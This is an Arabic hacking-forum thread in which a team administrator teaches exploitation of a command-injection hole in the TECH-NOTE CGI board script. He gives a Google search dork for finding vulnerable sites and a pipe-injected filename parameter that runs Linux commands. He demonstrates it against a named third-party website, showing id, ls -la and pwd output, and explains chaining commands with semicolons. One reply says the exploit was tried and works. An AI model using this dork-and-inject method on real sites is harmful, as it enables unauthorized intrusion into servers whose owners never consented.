اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

استغلال ثغرات Command ExecuTion

استغلال ثغرات Command ExecuTion


النتائج 1 إلى 7 من 7

الموضوع: استغلال ثغرات Command ExecuTion

  1. #1
    :: إدارة :: Aljyyosh Team Array الصورة الرمزية ASDELY-ScOrPiOn
    تاريخ التسجيل
    Jun 2009
    الدولة
    فلسطين
    المشاركات
    2,706

    New استغلال ثغرات Command ExecuTion




    الدورة التعليمية لاختراق المواقع و السيرفرات مقدمة من طرف ASDELY & SCORPION
    =/=/=/=/=/===================================

    استغلال ثغرات Command ExecuTion
    --==/=/=/=/=/=/=============================/
    ثغرات الCommand ExecuTion بالمختصر المفيد هي الثغرات التي تجعلنا نطبق اوامر Linux على السرفر .

    الثغرة اللي سوف نطبق عليها درسنا في سكربت TECH-NOTE
    [+] كود البحث في جوجل : inurl:/cgi-bin/technote
    [+] الاستغلال : main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|id|

    ملاحضة : الحاجة الوحيدة التي يجب تغييرها في الاستغلاله هي كلمة id , ضعو مكانها اي امر لنكس تريدونه (ls -la , uname -a , pwd...)
    الان نبدئ تطبيق هذه الثغرة >>
    اولا نشوفو اي محرك بحث : انا سوف اختار www.google.com
    ثم نكتب كود البحث >> inurl:/cgi-bin/technote
    اوكي كل تمام >> نختار اي موقع من المواق المحصل عليها : http://www.loveject.com/cgi-bin/technote
    الان سوف نطبق الثغرة باضافة الاستغلال >>
    http://www.loveject.com/cgi-bin/technote/main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|id|
    النتيجة :
    ############################
    uid=99(nobody) gid=99(nobody) groups=99(nobody)
    ############################

    لووووول الثغرة شغالة تمام >>
    نشوف اوامر لنكس اخرى :
    |ls -la| النتيجة :
    #############################
    total 1320
    drwxr-xr-x 7 byunghalee byunghalee 4096 May 14 2004 .
    drwxrwxrwx 10 byunghalee byunghalee 4096 Sep 4 2003 ..
    -rwxr-xr-x 1 byunghalee byunghalee 61515 Oct 25 2002 allshop.cgi
    drwxrwxrwx 52 byunghalee byunghalee 4096 May 7 02:33 board
    -rw-r--r-- 1 byunghalee byunghalee 184 Jan 28 2004 chat.gif
    drwxrwxrwx 5 byunghalee byunghalee 4096 Sep 4 2003 config
    -rwxr-xr-x 1 byunghalee byunghalee 17091 Nov 17 2002 config.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 214058 Oct 17 2002 help.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 51242 Jan 28 2004 humor.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 61171 May 30 2003 iboard.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 61171 Jan 28 2004 iboard2004.cgi
    drwxr-xr-x 2 byunghalee byunghalee 4096 Jan 28 2004 iboardicon
    drwxrwxrwx 12 byunghalee byunghalee 4096 Sep 4 2003 image
    -rwxr-xr-x 1 byunghalee byunghalee 86020 Sep 1 2002 index.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 60548 Mar 21 2003 inews.cgi
    -rwxrwxrwx 1 byunghalee byunghalee 21853 Jan 13 2003 info.html
    -rwxr-xr-x 1 byunghalee byunghalee 16696 Jun 30 2003 infor.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 2240 Jan 23 2003 install.cgi
    drwxrwxrwx 2 byunghalee byunghalee 4096 Sep 4 2003 library
    -rwxr-xr-x 1 byunghalee byunghalee 9501 Jun 4 2003 loginform.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 60947 Nov 17 2002 love.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 58058 Jan 27 2003 loveject.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 70726 Oct 17 2002 main.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 38765 Jan 29 2004 news2004.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 81832 Nov 6 2004 print.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 61506 Sep 1 2002 read.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 60694 May 10 2003 sayun.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 56419 Oct 24 2002 shop.cgi
    -rwxr-xr-x 1 byunghalee byunghalee 16432 Sep 1 2002 upgrade.cgi
    -rw-r--r-- 1 byunghalee byunghalee 42416 May 2 2003 ?¹Aü±¸µI¹?¸?AI.html
    ############################

    |pwd| التيجة :
    ##############################
    /wecan/byunghalee/www.loveject.com/cgi-bin/technote
    ###############################

    ملاحضة مهمة جذا : منكم من سوف يتساؤل عن طريقة تطبيق اوامامر متسلسلة , مثلا امر الدخول الى مجلد ثم امر اضهار الملفات حق هذا المجلد >> الطريقة سهلة جدا اذ يكفي فصل الاوامر بعالمة ;
    + مثلا نريد الدخول الى مجلد اسمه config ثم اضهار الملفات حق هذا المجلد >> main.cgi?down_num=5466654&board=rebarz99&command=d own_load&filename=rb9.txt|cd config;ls -la|

    اظن كل شيء واضح , يلا سلام يا شباب >>:D
    انتهى الشرح



  2. #2
    :: مشرف عام :: Aljyyosh Team Array الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: استغلال ثغرات Command ExecuTion



  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2009
    المشاركات
    19

    افتراضي رد: استغلال ثغرات Command ExecuTion

    جزاك الله خير



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Oct 2009
    المشاركات
    3

    افتراضي رد: استغلال ثغرات Command ExecuTion

    جزاك الله خير هلا والله ومليون غلا تو مانور المنتدى


  5. #5
    هكر مجتهد Array
    تاريخ التسجيل
    Oct 2009
    الدولة
    مسوي معسكر في منتدى جيوش الهكرز
    المشاركات
    273

    افتراضي رد: استغلال ثغرات Command ExecuTion

    يعطيك آلف عافيه يالغلا
    تقبل مروري المتوآضع


    ،


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2009
    المشاركات
    16

    افتراضي رد: استغلال ثغرات Command ExecuTion

    الثغره شغاله زى الفل
    وجربتها
    بس فى حاجه وقفت معايا وهى اوامر اللينكس ما فهمتهاش
    شكرا يا غالى



  7. #7
    هكر مجتهد Array الصورة الرمزية sahrawi7
    تاريخ التسجيل
    Dec 2009
    المشاركات
    444

    افتراضي رد: استغلال ثغرات Command ExecuTion

    مشكوووووووووووووووووووووو وووووووووووووووووور يا غالي


المواضيع المتشابهه

  1. شرح استغلال ثغرات Remote File Disclosure
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 9
    آخر مشاركة: 03-16-2012, 10:15 PM
  2. شرح استغلال ثغرات sql injection جاهزه
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 77
    آخر مشاركة: 12-22-2011, 08:27 AM
  3. شرح استغلال ثغرات command execution
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 46
    آخر مشاركة: 12-11-2011, 03:42 PM
  4. استغلال ثغرات file upload
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 68
    آخر مشاركة: 09-18-2011, 08:13 PM
  5. شرح استغلال ثغرات remote file disclousure
    بواسطة BLACK.JaGuAr في المنتدى قسم الثغرات
    مشاركات: 22
    آخر مشاركة: 08-31-2011, 08:25 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات command execution

inurl cgi-bintechnote

ثغرة command execution

شرح ثغرة command execution

شرح استغلال ثغرات command execution

Command Execution شرح ثغراتcommand execution شرح استغلال تغرة command executionCommand Execution اختراقhttp:www.aljyyosh.comvbshowthread.phpt=51242Command Execution‏ ثغراتinurl cgi-bin technoteثغرة cgi-syscommand excution شرحدورة ثغرات Command Executionثغرات command استغلال ثغرة Command Executionشرح ثغرة الكوماندثغرة ‏cgi-sys‏ في ‏vbاوامر استغعلال ثغرة cgiمجموعة اوامر ثغرة الفيس بوكثغرة command execution سكربتCommand Execution ثغرااcommand execute ثغرةcommand excution aljyyosh

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •